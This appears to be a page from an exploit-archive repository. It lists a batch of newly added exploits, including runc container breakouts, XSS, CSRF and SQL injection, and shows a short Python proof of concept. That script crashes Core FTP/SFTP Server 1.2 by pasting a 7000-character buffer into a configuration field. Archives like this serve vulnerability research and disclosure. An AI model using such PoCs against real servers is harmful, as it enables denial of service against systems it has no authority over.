
18 changes to exploits/shellcodes Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC) MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) exacqVision ESM 5.12.2 - Privilege Escalation runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure) DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)
26 lines
No EOL
918 B
Python
Executable file
26 lines
No EOL
918 B
Python
Executable file
#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-02-13
|
|
#Vendor Homepage: http://www.coreftp.com/
|
|
#Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe
|
|
#Tested Version: v2-Build 673
|
|
#Tested on: Windows 7 Service Pack 1 x32
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: Core_FTP_SFTP_Server_1.2.py
|
|
#2.- Open core_code.txt and copy content to clipboard
|
|
#3.- Open Core FTP Server
|
|
#4.- Select "Setup" > "New"
|
|
#5.- Select "Domain Name" and Put "Test"
|
|
#6.- Select "Domain IP/Address" and Put "1.1.1.1"
|
|
#7.- Select "Base directory" and Choose a directory path
|
|
#8.- Enable "WinNT users"
|
|
#9.- Select "User domain" and Paste Clipboard
|
|
#10.- Click on "Ok" and the next window click "Ok"
|
|
#11.- Crashed
|
|
|
|
cod = "\x41" * 7000
|
|
|
|
f = open('core_code.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |